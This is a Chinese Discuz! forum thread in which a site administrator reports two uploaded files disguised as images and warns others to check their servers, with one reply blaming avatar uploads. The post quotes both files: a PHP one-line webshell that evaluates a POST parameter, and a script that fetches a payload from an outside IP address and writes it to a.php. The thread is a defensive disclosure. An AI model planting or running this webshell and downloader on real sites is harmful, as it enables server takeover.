返回列表 发帖
查看: 5448|回复: 1

[求助] uc_server\data\tmp被上传木马文件 建议自查

15

主题

60

回帖

88

积分

渐入佳境

贡献
0 点
金币
9 个
发表于 2019-11-14 16:53:32 | 查看全部 |阅读模式
aa.jpg
今天网站搬家,顺手用最新版的D盾扫描了一下,发现两个可疑文件,图片格式。

路径为:uc_server\data\tmp

将格式图片格式的后缀改为  .php,用记事本打开,发现一句话木马,两个文件分别如下:
  1. <?php @eval($_POST['1']);?>
复制代码
  1. <script language="php"> $save=file_get_contents('http://103.198.194.134/php/xz.txt');  file_put_contents('a.php',$save) ;</script>
复制代码
目前暂时没扫出其他木马,怀疑上传木马后并没有成功执行。

文件名分别为:
upload37372
upload29060

后面的数字应该是用户ID,建议将图片改成随机数字命名,否则容易被黑客利用。
IIS的解析漏洞,配合这个,有可能能拿下webshell。

-------建议大家自查一下。  不知道新版有木有这个漏洞,知道的大神说下。

我知道答案 回答被采纳将会获得1 贡献 已有1人回答
回复

使用道具 举报

15

主题

1796

回帖

2076

积分

应用开发者

discuz 老兵

贡献
10 点
金币
188 个
QQ
发表于 2019-11-14 17:43:13 | 查看全部
这种情况一般都是头像进来的, 做好防护措施  尤其服务器  广告IIS有这个漏洞 包括  这个是PHP的漏洞
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

  • 关注公众号
  • 有偿服务微信
  • 有偿服务QQ

手机版|小黑屋|Discuz! 官方交流社区 ( 皖ICP备16010102号 |皖公网安备34010302002376号 )|网站地图|star

GMT+8, 2025-5-1 12:47 , Processed in 0.070381 second(s), 32 queries .

Powered by Discuz! W1.0 Licensed

Cpoyright © 2001-2025 Discuz! Team.

关灯 在本版发帖
有偿服务QQ
有偿服务微信
返回顶部
快速回复 返回顶部 返回列表